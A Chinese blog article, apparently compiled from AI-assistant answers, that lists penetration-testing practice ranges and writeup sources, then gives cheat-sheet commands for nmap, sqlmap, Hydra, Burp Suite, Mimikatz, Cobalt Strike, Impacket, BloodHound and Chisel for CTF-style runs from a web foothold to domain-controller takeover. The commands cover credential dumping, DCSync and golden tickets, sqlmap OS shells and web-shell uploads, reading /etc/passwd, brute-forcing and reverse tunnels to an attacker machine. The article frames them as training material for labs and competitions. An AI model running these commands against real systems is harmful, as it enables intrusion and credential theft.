ARTICLE DETAIL

建站实战干货

来自一线的建站与推广经验沉淀,每一条都经过真实交付验证。

从 Web 到域控:一套可打印的渗透测试工具链速查手册

2026/10/4 3:22:09 拓冰建站 浏览量
从 Web 到域控:一套可打印的渗透测试工具链速查手册 下面按类型帮你梳理主流渗透靶场的入口/下载地址以及配套 WPwriteup文章的获取途径。 在线靶场平台打开即用DVWADamn Vulnerable Web Application经典入门靶场SQLi/XSS/文件上传/命令注入等十几种漏洞Low→Medium→High→Impossible 四级难度可调。官网 dvwa.co.uk也可用 Docker 一行拉起docker run -d -p 80:80 vulnerables/web-dvwaPortSwigger Web Security AcademyBurp Suite 官方靶场覆盖 HTTP 走私、污染、SQLi、XSS、XXE、SSRF 等全部 Web 漏洞类型每个漏洞配讲解 交互式实验环境免费。入口portswigger.net/web-security/all-labsWebGoatOWASP 官方出品Java 版每种漏洞带教学文档比 DVWA 更系统。官网 owasp.org/www-project-webgoatbWAPP100 多种漏洞覆盖几乎全部 OWASP Top 10适合刷完 DVWA 后进阶。官网 itsecgames.comPikachu国内作者开发中文界面集成 SQLi、XSS、CSRF、SSRF、文件包含/上传等对新手极友好。GitHub 搜pikachu可取源码SQLi-Labs / XSS-Labs / Upload-Labs三个专项靶场分别 75 关 SQL 注入、20 余关 XSS、20 关文件上传绕过GitHub 搜项目名即可下载源码Hack The BoxHTB全球最火的在线渗透平台Web/逆向/密码学/取证每周更新靶机积分排名在外企认可度高。入口 hackthebox.comTryHackMe比 HTB 更友好有结构化学习路径和引导式 walkthrough含 Windows/Linux 靶场浏览器内置攻击机。入口 tryhackme.comRoot Me法国老牌免费平台400 CTF 风格挑战涵盖密码学、Web、脚本、网络、编程。入口 root-me.orgOverTheWireWargames命令行闯关式学习经典 Bandit/Narnia 系列全部免费。入口 overthewire.org/wargamesOffSec Proving GroundsPG 靶场OSCP/OSEP 认证官方练习场认可度极高。入口 offsec.com国内在线靶场BUUCTFbuuoj.cn历年 CTF 真题量最大、XCTF 攻防世界adworld.xctf.org.cn、CTFHubctfhub.com按技能树组织、墨者学院mozhe.cn/bug、封神台hack.zkaq.cn、春秋云镜yunjing.ichunqiu.com、好靶场loveli.com.cn500 原创靶机 可下载靶机镜像本地搭建VulnHub社区贡献的靶机镜像宝库.ova/.vmdk 格式导入 VMware/VirtualBox 即可含 Kioptrix 系列、DC 系列、HackTheBox 退役机器等。入口 vulnhub.comVulhub基于 Docker Docker-Compose 的漏洞环境集合预置大量 Nday 场景一键启动适合漏洞复现和 POC 验证。官网 vulhub.orgVulfocus白帽汇推出的漏洞集成平台Docker 镜像一键启动、自动更新 Flag、支持计分考核。入口 vulfocus.cn红日靶场VulnStack模拟真实企业内网涵盖域控、黄金票据、横向移动目前共 7 套网上 WP 齐全。入口 vulnstack.qiyuanxuetang.net/vulnHackMyVM类似 VulnHub 的国际平台提供虚拟机镜像含域环境和少量 Windows 靶机。官网 hackmyvm.euMetasploitable 2/3Rapid7 官方靶机漏洞密集专为 Metasploit 框架练习设计CyberStrikeLab域渗透 内网渗透综合场景从 3 台到 7-8 台多层网络横向移动部分涉及免杀。入口 cyberstrikelab.comGOADGame of Active Directory专注 AD 攻击技术的开源靶场Vagrant Ansible 自动化部署VulnTarget开源综合实战靶场社区维护支持提交设计 WP / 通关教程文章汇总DVWA 全关卡通关 源码审计博客园「H轨迹H」的 DVWA 合集覆盖暴力破解、命令注入、文件包含、文件上传、弱会话、不安全验证码、重定向、JS 攻击、CSP 绕过、未授权绕过、XSS 全部关卡的 Low→Impossible 全级别通关与代码审计见 cnblogs.com/GuijiH6DVWA SQL 注入实操笔记FreeBuf 上的 DVWA SQLi Low/Medium/High 全级别手工注入通关附 Payload 和原理拆解见 freebuf.com/news/489636.htmlVulnHub 靶机 WPCSDN 博主「judy2580」的 DC-1、DC-2 完整渗透测试笔记从信息收集到提权全流程记录见 blog.csdn.net/zd8206CyberStrikeLab 域渗透 WP「【域渗透】CyberStrikelab 靶场 lab1-lab113w 字超详细」是目前该靶场最完整的中文通关文档HackMyVM Windows 域渗透 WP「全网首发HMV 全套 13 台 Windows 域渗透教程3w 字超详细」覆盖域控与横向移动HTB 靶机 WP如「HTB-Chemistry 靶机渗透教程」HTB 官方论坛forum.hackthebox.com的「Writeups」板块也有大量社区 WPCTF 解题思路合集CSDN「50 个 CTF 实战解题核心思路」覆盖 Web/逆向/PWN/密码学/隐写高频套路见 blog.csdn.net/m0_56146626/article/details/159169341综合汇总帖知乎「全网最全渗透测试靶场推荐【2026最新靶场推荐】」和 CSDN「2026网络安全实战靶场平台汇总20个练手平台」两篇都附带了各靶场的配套文章链接适合作为索引收藏 建议路线DVWA → bWAPP/Pikachu → 专项靶场SQLi-Labs、Upload-Labs→ VulnHub/HTB 综合靶机 → 红日靶场/VulnStack 内网渗透。刷的时候建议边打边记 Payload、漏洞原理和修复方案配合 nmap、sqlmap、hydra、Burp Suite 使用。wp下面把之前提到的 WP 文章逐条整理出来能确认到的都附上了链接或明确来源个别 WP 标题只出现在汇总帖里但没有检索到独立可访问的原文链接我会标注出来。DVWA 全模块通关 源码审计来源博客园「H轨迹H」内容覆盖 DVWA 的 Brute Force、Command Injection、File Inclusion、File Upload、Weak Session IDs、Insecure CAPTCHA、Open HTTP Redirect、JavaScript Attacks、CSP Bypass、Authorisation Bypass、XSS 等模块基本是 Low / Medium / High / Impossible 全级别通关 源码审计。访问方式在博客园搜索H轨迹H DVWA或进入该作者博客园主页后按“DVWA靶场”系列文章浏览。说明检索到的原文是各模块独立文章未找到该系列“总目录页”的精确链接所以不单独给一个固定 URL。DVWA SQL 注入全级别通关标题DVWA SQL 注入全级别通关笔记Low / Medium / High / Impossible来源CSDN链接https://blog.csdn.net/news/489636.html内容Low / Medium / High / Impossible 四个级别的显注、盲注、sqlmap 用法、POST 注入绕过、Session 机制与代码审计。说明之前提到的 FreeBuf 链接未检索到对应原文CSDN 这篇内容更完整建议以这篇为准。DVWA SQL Injection 通关教程标题DVWA靶场通关——SQL Injection篇来源博客园 ljbguanli访问方式博客园搜索ljbguanli DVWA SQL Injection内容Low 级别 Union 注入、字段数判断、回显点确认、爆库爆表爆字段Medium 级别 POST 型注入。DVWA 保姆级通关教程标题dvwa靶场通关教程保姆及教学一看就会来源CSDN访问方式CSDN 搜索dvwa靶场通关教程 保姆内容覆盖暴力破解、命令注入、CSRF、文件包含、文件上传、不安全验证码、SQL 注入、盲注、弱会话、DOM/反射/存储型 XSS、CSP Bypass、JS 攻击等。VulnHub DC-1 / DC-2 通关笔记作者judy2580来源CSDN访问方式CSDN 搜索judy2580 DC-1和judy2580 DC-2内容DC-1 涉及 Drupal 站点、历史漏洞利用、配置文件读取、数据库凭证获取、提权DC-2 涉及 WordPress、SSH 弱口令、rbash 绕过、sudo 提权。补充VulnHub DC-1 还有博客园「娜娜米」的通关文章可搜索VulnHub DC-1靶机通关 娜娜米。CyberStrikeLab Lab1 及系列 WP博客园版Cyberstrikelab Lab1作者「巡璃27」包含 nmap、fscan、域用户密码、NTLM 哈希、MS17-010、端口转发等过程。CSDN 版CyberStrikeLab-Lab1涉及 EyouCMS 前台 GetShell、RCE 上线、内网扫描、域控发现、永恒之蓝等。访问方式分别搜索Cyberstrikelab Lab1 巡璃27 博客园、CyberStrikeLab Lab1 CSDN。说明之前提到的“lab1-lab11 3w 字超详细 WP”确实存在于 2026 年的靶场汇总推荐中但未检索到该长文的独立可访问链接建议在知乎或公众号搜索CyberStrikelab lab1-lab11 3w字继续定位。HackMyVM 相关 WPHMV DC04CSDN 文章《【hackmyvm】DC04靶机wp》涉及 NTLM 中毒、SMB 探测、RPC 用户信息、压缩包破解、黄金票据、PTT 等。HMV always博客园《hackmyvm靶机 always复现》涉及 FTP、RDP、Apache、CVE-2017-0213 提权。访问方式分别搜索hackmyvm DC04 wp CSDN、hackmyvm靶机 always复现 博客园。说明之前提到的“HMV 全套 13 台 Windows 域渗透教程3w 字超详细”在 2026 年靶场推荐文章中出现过但未检索到该合集的独立原文链接。HTB Chemistry 靶机 WPCSDN 版HTBChemistry[WriteUP]涉及 nmap、5000 端口、CIF 文件上传、CVE-2024-23346、database.db、sqlite3 查询等。博客园版Hack The Box-Chemistry靶机渗透作者「H轨迹H」涉及 CVE-2024-23346 RCE、SSH 登录、CVE-2024-23334 aiohttp 路径遍历、root flag。访问方式搜索HTB Chemistry WriteUP CSDN或H轨迹H HTB Chemistry。CTF 50 个实战解题思路标题CTF选手必藏的50个实战解题思路一篇够用来源CSDN访问方式CSDN 搜索CTF选手必藏的50个实战解题思路内容Web 安全 15 个思路、逆向与 PWN 12 个技巧、密码学与隐写 13 个思路、MISC 与编程 10 个方法。说明之前给出的带159169341的文章 ID 未检索到对应原文建议按标题搜索避免点错链接。2026 靶场汇总类文章知乎版拒绝信息差全网最全渗透测试靶场推荐【2026最新版】作者/账号“泷羽Sec”。公众号版同名文章内容与知乎版基本一致。CSDN 版2026网络安全实战靶场平台汇总20个练手平台收藏这一篇就够了访问方式知乎 / 微信 / CSDN 分别搜索上述标题即可。使用建议刷 WP 时建议按这个顺序看先看靶场官方文档或 README再自己打一遍最后对照 WP 补盲区。尤其打 VulnHub、HTB、红日靶场、CyberStrikeLab 这类综合靶机时WP 只适合复盘不要直接照抄命令。常用工具使用方法结合你之前刷靶场的场景把nmap、sqlmap、Burp Suite、Hydra的常用命令和实战技巧整理成一套可直接套用的速查表。nmap信息收集与端口/服务识别常用扫描# 基础主机发现 nmap -sn 192.168.1.0/24 # 常用端口快速扫描 nmap -F 192.168.1.100 # 全端口 TCP 扫描 nmap -p- 192.168.1.100 # SYN 半开放扫描 nmap -sS -p 1-65535 192.168.1.100 # 服务版本探测 nmap -sV -p 80,443,22,3306 192.168.1.100 # 操作系统识别 nmap -O --osscan-guess 192.168.1.100 # 综合探测 nmap -A -p- 192.168.1.100 # UDP 扫描 nmap -sU -p 53,69,161,500 192.168.1.100 # 输出结果 nmap -sV -oN result.txt -oX result.xml 192.168.1.100NSE 脚本实战# 漏洞检测 nmap --script vuln 192.168.1.100 # Web 目录枚举 nmap --script http-enum -p 80,443 target.com # 心脏出血检测 nmap --script ssl-heartbleed -p 443 target.com # 永恒之蓝检测 nmap --script smb-vuln-ms17-010 -p 445 192.168.1.0/24 # SQL 注入初筛 nmap --script http-sql-injection -p 80 target.com # 子域名爆破 nmap --script dns-brute target.com实战技巧内网先-sn探活再对存活主机做-sV -A。打 HTB/VulnHub 时先-p-扫全端口避免漏掉非标准端口服务。内网横向时smb-vuln-ms17-010很常用。需要隐蔽时可用--scan-delay、--max-rate、-f分片、-D诱饵。sqlmapSQL 注入检测与数据提取基础检测# GET 注入检测 sqlmap -u http://target/?id1 --batch # POST 注入检测 sqlmap -u http://target/login \ --data usernameadminpassword123 --batch # 从 Burp 请求文件检测 sqlmap -r request.txt --batch # Cookie 注入 sqlmap -u http://target/?id1 \ --cookie uid123 --batch数据枚举# 枚举数据库 sqlmap -u URL --batch --dbs # 枚举表 sqlmap -u URL --batch -D security --tables # 枚举字段 sqlmap -u URL --batch -D security -T users --columns # 导出字段 sqlmap -u URL --batch \ -D security -T users -C username,password --dump进阶利用# 指定注入技术 sqlmap -u URL --techniqueBEUST --batch # 提高检测深度 sqlmap -u URL --level3 --risk2 --batch # 获取系统 Shell sqlmap -u URL --os-shell # 读取文件 sqlmap -u URL --file-read /etc/passwd # 上传文件 sqlmap -u URL \ --file-write shell.php --file-dest /var/www/html/shell.php # WAF 绕过 sqlmap -u URL \ --tamperspace2comment,between,randomcase --batch实战技巧靶场里先手动判断注入类型再用 sqlmap 验证。有 WAF 时先--identify-waf再配合--tamper。--level越高测试越全面但请求量也会明显增加。--os-shell属于高风险操作只在授权靶场里练习。Burp Suite抓包、重放与 Web 漏洞验证推荐工作流浏览器/FoxyProxy → Burp Proxy → Repeater → Intruder → 漏洞验证常用操作Proxy监听127.0.0.1:8080浏览器配置代理并安装 Burp CA 证书。Target / Scope把靶场域名加入 Scope减少无关流量。Repeater手工改包验证 SQLi、XSS、SSRF、越权、接口逻辑漏洞。Intruder做密码爆破、参数 fuzz、验证码/Token 绕过测试。Decoder做 Base64、URL、Hex 等编码解码。Collaborator验证盲注、SSRF、外带数据类漏洞。Intruder 爆破登录示例在 Proxy 拦截登录请求。右键Send to Intruder。在Positions里清除默认标记只标记密码字段。在Payloads加载字典如rockyou.txt或自定义字典。攻击类型选Sniper或Pitchfork观察响应长度、状态码差异。实战技巧浏览器优先用 Firefox配合 FoxyProxy 管理代理。HTTPS 抓包必须安装 Burp CA 证书。验证漏洞时先在 Repeater 重放确认再用 Intruder 批量测试。复杂接口可配合 Macros 处理 CSRF Token。Hydra服务弱口令爆破SSH 爆破hydra -L users.txt -P pass.txt -t 6 -vV ssh://192.168.1.100FTP 爆破hydra -l admin -P pass.txt -t 6 -vV ftp://192.168.1.100HTTP POST 表单爆破hydra -l admin -P pass.txt -t 6 -vV \ 192.168.1.100 http-post-form \ /login.php:username^USER^password^PASS^:Login FailedRDP 爆破hydra -L users.txt -P pass.txt -t 2 -vV rdp://192.168.1.100MySQL 爆破hydra -l root -P pass.txt -t 6 -vV mysql://192.168.1.100实战技巧字典质量比线程数更重要优先用针对性字典。线程数不要太高SSH/RDP 这类服务建议-t 2到-t 6。有验证码、登录锁定、WAF 时Hydra 效果会明显下降。找到结果后加-f或-F及时停止。爆破结果可用-o result.txt保存。靶场实战推荐组合靶场场景推荐工具组合练习重点DVWA / PikachuBurp sqlmap HydraWeb 漏洞、注入、爆破SQLi-Labssqlmap Burp Repeater注入类型判断与利用Upload-LabsBurp 文件上传绕过后缀、MIME、截断、解析VulnHub / HTBnmap Burp sqlmap Hydra信息收集到漏洞利用全流程红日靶场 / VulnStacknmap Hydra 域渗透工具内网探测、弱口令、横向移动所有命令只建议在本地靶场、授权环境或比赛环境中练习。打靶时可以先用 nmap 找入口再用 Burp 分析 Web 逻辑遇到注入上 sqlmap遇到登录口再考虑 Hydra这样链路会更清晰。内网渗透/域渗透的常用工具链结合你平时练 Kali 内网渗透、会话管理和工具部署的场景下面这套可以当作内网/域渗透工具链速查表。全部命令只建议在本地靶场、授权环境或比赛环境里练习。实战链路内网入口 → 信息收集 → 凭据获取 → 横向移动 → 域路径分析 → 代理穿透 → 拿下域控1. Mimikatz凭据抓取与传递基础提权与凭据抓取privilege::debug sekurlsa::logonpasswords lsadump::sam哈希传递sekurlsa::pth /user:admin /domain:domain.local /ntlm:NTLM_HASH票据操作sekurlsa::tickets /export kerberos::ptt ticket.kirbiDCSync 获取域哈希lsadump::dcsync /domain:domain.local /user:Administrator黄金票据kerberos::golden /user:Administrator /domain:domain.local /sid:SID /krbtgt:KRBTGT_HASH /ticket:golden.kirbi kerberos::ptt golden.kirbi实战技巧打靶机时先确认是否拿到管理员权限否则 Mimikatz 很多功能会失败。抓取凭据后优先看 NTLM Hash、明文密码、Kerberos 票据三类。生产环境里 Mimikatz 极易触发告警靶场练习时也要养成“先复现、再分析日志”的习惯。2. Cobalt Strike会话管理与内网穿透启动 Team Server./teamserver 攻击机IP 密码客户端连接后常用操作# 调整心跳 sleep 5 # 开启 SOCKS 代理 socks 1080 # 反向端口转发 rportfwd 8080 内网IP 80 # 查看会话 beacon list # 执行系统命令 shell whoami shell ipconfig /all shell net user /domain横向移动# PsExec psexec \\目标IP -u 用户名 -p 密码 # WMI 横向 wmi 目标IP getsystem # 计划任务 schtasks /create /s 目标IP /tn 任务名 /tr payload /sc once /st 时间实战技巧CS 很适合练“多会话管理”比如从入口机跳到内网多台主机。HTTP/HTTPS Beacon 适合常规环境DNS Beacon 适合只放行 DNS 的靶场。代理打通后本地工具可通过socks 1080访问内网服务。3. BloodHound域关系可视化数据收集SharpHound.exe -c All SharpHound.exe -c All --LoopPython 收集器python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All分析流程把 SharpHound 生成的 zip 导入 BloodHound。运行Shortest Paths to Domain Admins。查找 DCSync 权限、GenericAll、本地管理员路径。标记已控主机重新计算攻击路径。实战技巧BloodHound 不直接执行攻击它帮你画“从当前用户到域管”的最短路径。打域靶场时先跑一次 SharpHound能大幅减少盲目枚举。4. Impacket远程执行与 Kerberos 攻击远程执行python3 psexec.py domain/user:pass目标IP python3 wmiexec.py domain/user:pass目标IP python3 smbexec.py domain/user:pass目标IP python3 dcomexec.py domain/user:pass目标IP python3 atexec.py domain/user:pass目标IP whoami哈希传递python3 psexec.py -hashes :NTLM_HASH domain/user目标IP python3 wmiexec.py -hashes :NTLM_HASH domain/user目标IP凭据与 Kerberospython3 secretsdump.py domain/user:passDC_IP python3 GetUserSPNs.py domain/user:pass -request python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat python3 ntlmrelayx.py -t smb://目标IP实战技巧wmiexec隐蔽性较好不依赖创建服务。psexec通用性强但痕迹相对明显。GetUserSPNs.py常用于 Kerberoasting 场景。secretsdump.py适合在拿到域管凭据后导出域内哈希。5. 辅助横向工具CrackMapExec 批量验证crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txtEvil-WinRM 远程 PowerShellevil-winrm -i 目标IP -u administrator -p 密码 evil-winrm -i 目标IP -u administrator -H NTLM_HASHRDP 横向xfreerdp /v:目标IP /u:administrator /p:密码内网代理proxychains nmap -sT -Pn 192.168.2.10 proxychains curl http://内网IP打靶场推荐顺序VulnHub / HTB 单靶机练 nmap → 提权 → Mimikatz。红日靶场 / VulnStack练域信息收集、横向移动、CS 会话管理。CyberStrikeLab / GOAD练 BloodHound、Kerberoasting、DCSync、黄金票据。复盘阶段把每一步命令、凭据、路径整理成自己的工具链笔记。从入口机到域控的完整打靶流程模板下面这套模板按“西湖论剑线下城市网络战”风格设计入口机 → 内网探测 → 横向移动 → 域控 → 代理穿透 → 关键资产。团队赛里可以一人负责 Web 入口一人负责内网探测一人负责域渗透一人负责代理/Flag 提交。阶段 0赛前准备# 攻击机基础配置 ip a route -n cat /etc/resolv.conf systemctl status network-manager # 常用字典与工具检查 ls /usr/share/wordlists/rockyou.txt which nmap sqlmap hydra crackmapexec evil-winrm proxychains建议赛前把nmap、sqlmap、Burp、Hydra、CrackMapExec、Impacket、proxychains、Chisel全部确认可用。阶段 1入口机突破# 端口与服务探测 nmap -sV -sC -p- 入口机IP nmap -A -p 80,443,8080,8443 入口机IP # Web 目录枚举 dirsearch -u http://入口机IP -e php,asp,html ffuf -u http://入口机IP/FUZZ -w /usr/share/wordlists/dirb/common.txt # 常见入口点 # - Web 后台弱口令 # - 文件上传 / 命令执行 # - SQL 注入 # - Redis / Tomcat / Jenkins 未授权 # - 旧 CMS 历史漏洞拿到 Shell 后先做本地信息收集whoami hostname ip a netstat -antp cat /etc/passwd find / -perm -4000 2/dev/null cat /var/www/html/config.php 2/dev/null阶段 2内网探测# 本机网络 ip a route -n cat /etc/resolv.conf # 存活主机探测 nmap -sn 192.168.2.0/24 fping -ag 192.168.2.0/24 # 端口批量探测 nmap -sT -Pn -p 22,80,445,3389,135,139,8080 192.168.2.0/24 # 域信息 net user /domain nltest /dclist:domain.local nslookup domain.localWindows 靶机可用systeminfo whoami /all net user net group Domain Admins /domain net view /domain阶段 3凭据获取# Mimikatz privilege::debug sekurlsa::logonpasswords lsadump::sam # Impacket 远程导出 python3 secretsdump.py domain/user:passDC_IP # Kerberoasting python3 GetUserSPNs.py domain/user:pass -request # AS-REP Roasting python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat拿到哈希或密码后优先整理成表格用户名、明文密码、NTLM Hash、所在主机。阶段 4横向移动# PsExec python3 psexec.py domain/admin:pass目标IP # WMIExec python3 wmiexec.py domain/admin:pass目标IP # SMBExec python3 smbexec.py domain/admin:pass目标IP # WinRM evil-winrm -i 目标IP -u admin -p pass evil-winrm -i 目标IP -u admin -H NTLM_HASH # CrackMapExec 批量验证 crackmapexec smb 192.168.2.0/24 -u admin -p pass crackmapexec smb 192.168.2.0/24 -u admin -H NTLM_HASH阶段 5域控突破# BloodHound 收集 SharpHound.exe -c All python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All # DCSync python3 secretsdump.py domain/adminDC_IP mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt # 黄金票据 kerberos::golden /user:admin /domain:domain.local /sid:SID /krbtgt:HASH /ticket:golden.kirbi kerberos::ptt golden.kirbi拿下域控后优先检查域管账号、GPO、共享、计划任务、其他主机本地管理员。阶段 6代理与穿透# CS 开启 SOCKS socks 1080 # Chisel 反向代理 # 攻击机 chisel server -p 9999 --reverse # 靶机 chisel client 攻击机IP:9999 R:1080:socks # proxychains 使用 proxychains nmap -sT -Pn 10.10.10.10 proxychains evil-winrm -i 10.10.10.10 -u admin -p pass阶段 7Flag 与复盘常见 Flag 位置/root/flag.txt C:\Users\Administrator\Desktop\flag.txt C:\flag.txt /var/www/html/flag 数据库某张表 DNS TXT 记录 HTTP 响应头复盘时建议记录入口点是什么。拿到了哪些凭据。横向路径入口机 → 哪台主机 → 域控。用了哪些工具。哪些步骤卡住、为什么卡住。如果重打一遍哪里可以更快。团队分工建议角色任务常用工具Web 手找入口、打 Web 漏洞Burp、sqlmap、dirsearch内网手探测、凭据、横向nmap、CrackMapExec、Mimikatz域渗透手域信息、票据、DCSyncBloodHound、Impacket、Evil-WinRM代理/提交手隧道、Flag 提交、记录proxychains、Chisel、笔记表这套模板适合赛前反复演练先用红日靶场/VulnStack 跑通一遍再把每一步命令固化成团队自己的速查表。完整的渗透测试工具链速查手册按 Web 渗透→内网渗透→域渗透的结构排好下面这份已经按Web 渗透 → 内网渗透 → 域渗透的顺序整理好了可以直接复制到 Obsidian、Notion、Typora 或打印成纸质速查表。全部命令只用于本地靶场、授权环境和比赛练习。渗透测试工具链速查手册一、Web 渗透1. 信息收集# 主机发现 nmap -sn 192.168.1.0/24 # 端口与服务探测 nmap -sV -sC -p- 目标IP nmap -A -p 80,443,8080,8443 目标IP # Web 目录枚举 dirsearch -u http://目标IP -e php,asp,html ffuf -u http://目标IP/FUZZ -w /usr/share/wordlists/dirb/common.txt # 子域名探测 nmap --script dns-brute 目标域名2. 常见入口点Web 后台弱口令文件上传 / 命令执行SQL 注入Redis、Tomcat、Jenkins 未授权旧 CMS 历史漏洞SSRF、XXE、反序列化3. SQL 注入# GET 注入 sqlmap -u http://target/?id1 --batch # POST 注入 sqlmap -u http://target/login \ --data usernameadminpassword123 --batch # 从 Burp 请求文件检测 sqlmap -r request.txt --batch # 枚举数据库 sqlmap -u URL --batch --dbs # 枚举表 sqlmap -u URL --batch -D security --tables # 枚举字段 sqlmap -u URL --batch -D security -T users --columns # 导出字段 sqlmap -u URL --batch \ -D security -T users -C username,password --dump # WAF 绕过 sqlmap -u URL \ --tamperspace2comment,between,randomcase --batch4. 爆破与弱口令# SSH 爆破 hydra -L users.txt -P pass.txt -t 6 -vV ssh://目标IP # FTP 爆破 hydra -l admin -P pass.txt -t 6 -vV ftp://目标IP # HTTP POST 表单爆破 hydra -l admin -P pass.txt -t 6 -vV \ 目标IP http-post-form \ /login.php:username^USER^password^PASS^:Login Failed # RDP 爆破 hydra -L users.txt -P pass.txt -t 2 -vV rdp://目标IP5. Burp Suite 常用流程浏览器/FoxyProxy → Burp Proxy → Repeater → Intruder → 漏洞验证Proxy抓包、改包。Repeater验证 SQLi、XSS、越权、逻辑漏洞。Intruder密码爆破、参数 fuzz。Decoder编码解码。Collaborator盲注、SSRF、外带数据验证。6. 拿到 Web Shell 后whoami hostname ip a netstat -antp cat /etc/passwd find / -perm -4000 2/dev/null cat /var/www/html/config.php 2/dev/null二、内网渗透1. 本机信息收集# Linux ip a route -n cat /etc/resolv.conf cat /etc/passwd netstat -antp find / -perm -4000 2/dev/null # Windows systeminfo whoami /all ipconfig /all net user net localgroup administrators2. 内网存活探测nmap -sn 192.168.2.0/24 fping -ag 192.168.2.0/24 nmap -sT -Pn -p 22,80,445,3389,135,139,8080 192.168.2.0/243. 服务探测# SMB nmap --script smb-vuln-ms17-010 -p 445 目标网段 # HTTP nmap --script http-enum -p 80,443,8080 目标IP # 数据库 nmap -sV -p 3306,1433,5432,6379 目标IP4. 凭据抓取# Mimikatz privilege::debug sekurlsa::logonpasswords lsadump::sam5. 横向移动# PsExec python3 psexec.py domain/user:pass目标IP python3 psexec.py -hashes :NTLM_HASH domain/user目标IP # WMIExec python3 wmiexec.py domain/user:pass目标IP # SMBExec python3 smbexec.py domain/user:pass目标IP # WinRM evil-winrm -i 目标IP -u admin -p pass evil-winrm -i 目标IP -u admin -H NTLM_HASH # CrackMapExec 批量验证 crackmapexec smb 192.168.2.0/24 -u admin -p pass crackmapexec smb 192.168.2.0/24 -u admin -H NTLM_HASH6. 代理穿透# Cobalt Strike socks 1080 # Chisel 反向代理 # 攻击机 chisel server -p 9999 --reverse # 靶机 chisel client 攻击机IP:9999 R:1080:socks # proxychains 使用 proxychains nmap -sT -Pn 10.10.10.10 proxychains evil-winrm -i 10.10.10.10 -u admin -p pass三、域渗透1. 域信息收集# Windows 本机 net user /domain net group Domain Admins /domain nltest /dclist:domain.local nslookup domain.local # Impacket python3 secretsdump.py domain/user:passDC_IP2. BloodHound 分析SharpHound.exe -c All SharpHound.exe -c All --Loop python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All分析重点Shortest Paths to Domain AdminsDCSync 权限GenericAll本地管理员路径已控主机重新计算路径3. Kerberos 攻击# Kerberoasting python3 GetUserSPNs.py domain/user:pass -request # AS-REP Roasting python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat # 票据传递 kerberos::ptt ticket.kirbi4. DCSync 与黄金票据# DCSync python3 secretsdump.py domain/adminDC_IP mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt # 黄金票据 kerberos::golden /user:admin /domain:domain.local /sid:SID /krbtgt:HASH /ticket:golden.kirbi kerberos::ptt golden.kirbi5. 域控后检查域管账号列表GPO 策略域共享计划任务其他主机本地管理员DNS、ADCS、Exchange 等关键资产四、团队赛分工模板角色任务常用工具Web 手找入口、打 Web 漏洞Burp、sqlmap、dirsearch、ffuf内网手探测、凭据、横向nmap、CrackMapExec、Mimikatz域渗透手域信息、票据、DCSyncBloodHound、Impacket、Evil-WinRM代理/提交手隧道、Flag 提交、记录proxychains、Chisel、笔记表五、赛前检查清单nmap、sqlmap、Burp、Hydra 可用CrackMapExec、Impacket、Evil-WinRM 可用Mimikatz、SharpHound、BloodHound 可用proxychains、Chisel 可用字典rockyou.txt、常见弱口令字典攻击机网络、DNS、代理配置正常团队分工明确Flag 提交流程明确六、赛后复盘模板入口点是什么拿到了哪些凭据横向路径入口机 → 哪台主机 → 域控用了哪些工具哪些步骤卡住原因是什么如果重打一遍哪里可以更快哪些命令可以固化为团队速查表